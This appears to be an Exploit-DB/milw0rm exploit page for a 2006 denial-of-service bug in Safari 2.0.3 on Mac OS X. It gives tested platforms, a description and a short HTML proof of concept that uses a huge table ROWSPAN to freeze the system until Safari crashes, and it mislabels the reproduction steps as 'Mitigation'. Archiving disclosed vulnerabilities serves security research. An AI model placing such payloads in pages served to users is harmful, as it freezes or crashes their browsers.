header-logo
Suggest Exploit
vendor:
Safari
by:
Yannick von Arx
7,5
CVSS
HIGH
SRCOD (Spinning Rainbow Cursor Of Death)
N/A
CWE
Product Name: Safari
Affected Version From: Safari 2.0.3 (417.9.2)
Affected Version To: Safari 2.0.3 (417.9.2)
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iBook G4 1.2 GHz with Mac OS X 10.4.5 (Build 8H14), iBook G4 1.33 GHz with Mac OS X 10.4.6 (Build 8I127), PowerMac G4 Dual 867 MHz with Mac OS X 10.4.6 (Build 8I127), iMac G4 800 MHz with Mac OS X 10.4.6 (Build 8I127)
2006

Apple Mac OS X Safari 2.0.3 Vulnerability

A vulnerabilitiy exists in Safari 2.0.3 (417.9.2) and perhaps in prior versions which causes the operating system to slow down SRCOD (Spinning Rainbow Cursor Of Death), and therefore, it's not possible to launch any applications like Terminal to kill the process. After several minutes Safari crashes.

Mitigation:

Create a new File with following code
Source

Exploit-DB raw data:

<!--
Apple Mac OS X Safari 2.0.3 Vulnerability
=========================================

Author: Yannick von Arx
Email:  yannick[dot]vonarx[at]yanux[dot]ch

Release Date:
April 23th, 2006

Vendor:
Apple Computer Inc.

Tested on:
iBook G4 1.2 GHz with Mac OS X 10.4.5 (Build 8H14) + all Updates from Apple except "10.4.6 Update"
iBook G4 1.33 GHz with Mac OS X 10.4.6 (Build 8I127) + all Updates from Apple
PowerMac G4 Dual 867 MHz with Mac OS X 10.4.6 (Build 8I127) + all Updates from Apple
iMac G4 800 MHz with Mac OS X 10.4.6 (Build 8I127) + all Updates from Apple

Versions affected:
Safari 2.0.3 (417.9.2) latest version under 10.4.5 (Build 8H14) and perhaps prior versions
Safari 2.0.3 (417.9.2) latest version under 10.4.6 (Build 8I127) and perhaps prior versions

Overview:
A vulnerabilitiy exists in Safari 2.0.3 (417.9.2) and perhaps in
prior versions which causes the operating system to slow down SRCOD
(Spinning Rainbow Cursor Of Death), and therefore, it's not possible
to launch any applications like Terminal to kill the process. After
several minutes Safari crashes.

Technical Details:
Create a new File with following code ... -->

<HTML>
<TABLE>
<TR><TD ROWSPAN=2000000000>

# milw0rm.com [2006-04-24]

Navigation

Suggest Exploit

Services By CQR